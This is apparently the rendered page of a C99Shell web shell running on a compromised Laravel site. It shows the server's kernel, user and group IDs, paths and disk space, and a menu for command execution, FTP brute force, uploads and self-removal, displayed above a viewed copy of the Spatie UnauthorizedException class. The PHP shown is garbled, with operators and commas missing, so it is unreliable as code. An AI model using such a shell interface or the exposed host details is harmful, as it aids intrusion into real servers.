!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html/vendor/spatie/laravel-permission/src/Exceptions/   drwxr-xr-x
Free 24.88 GB of 117.98 GB (21.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     UnauthorizedException.php (2.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Permission\Exceptions;

use 
Symfony\Component\HttpKernel\Exception\HttpException;

class 
UnauthorizedException extends HttpException
{
    private 
$requiredRoles = [];

    private 
$requiredPermissions = [];

    public static function 
forRoles(array $roles): self
    
{
        
$message 'User does not have the right roles.';

        if (
config('permission.display_permission_in_exception')) {
            
$permStr implode(', '$roles);
            
$message 'User does not have the right roles. Necessary roles are '.$permStr;
        }

        
$exception = new static(403$messagenull, []);
        
$exception->requiredRoles $roles;

        return 
$exception;
    }

    public static function 
forPermissions(array $permissions): self
    
{
        
$message 'User does not have the right permissions.';

        if (
config('permission.display_permission_in_exception')) {
            
$permStr implode(', '$permissions);
            
$message 'User does not have the right permissions. Necessary permissions are '.$permStr;
        }

        
$exception = new static(403$messagenull, []);
        
$exception->requiredPermissions $permissions;

        return 
$exception;
    }

    public static function 
forRolesOrPermissions(array $rolesOrPermissions): self
    
{
        
$message 'User does not have any of the necessary access rights.';

        if (
config('permission.display_permission_in_exception') && config('permission.display_role_in_exception')) {
            
$permStr implode(', '$rolesOrPermissions);
            
$message 'User does not have the right permissions. Necessary permissions are '.$permStr;
        }

        
$exception = new static(403$messagenull, []);
        
$exception->requiredPermissions $rolesOrPermissions;

        return 
$exception;
    }

    public static function 
notLoggedIn(): self
    
{
        return new static(
403'User is not logged in.'null, []);
    }

    public function 
getRequiredRoles(): array
    {
        return 
$this->requiredRoles;
    }

    public function 
getRequiredPermissions(): array
    {
        return 
$this->requiredPermissions;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--